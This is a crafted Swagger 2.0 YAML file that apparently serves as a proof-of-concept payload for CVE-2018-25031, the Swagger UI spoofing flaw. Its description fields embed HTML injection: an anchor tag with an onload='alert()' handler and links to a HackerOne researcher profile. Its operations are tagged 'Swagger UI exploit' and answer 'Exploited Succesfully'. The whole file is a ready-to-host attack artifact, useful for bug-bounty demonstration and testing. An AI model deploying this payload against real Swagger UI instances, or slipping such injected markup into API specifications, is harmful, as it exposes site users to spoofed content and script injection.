---
swagger: '2.0'
info:
  title: Exploited by Al-Muntadhar
  description: |
    CVE-2018-25031 | <a href="https://hackerone.com/almuntadhar">Click here</a>

  version: production
basePath: https://hackerone.com/almuntadhar
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/almuntadhar":
    get:
      responses:
        '200':
          description: Exploited Succesfully
      tags:
      - EZ
      operationId: findAccounts
      summary: this is example text
  "/almuntadhar_2":
    delete:
      parameters:
      - description: |
          <a href="https://hackerone.com/almuntadhar" onload="alert()" >Hackerone</a>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: CVE-2018-25031
      tags:
      - Swagger UI exploit
      operationId: swagger
      summary: swagger
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
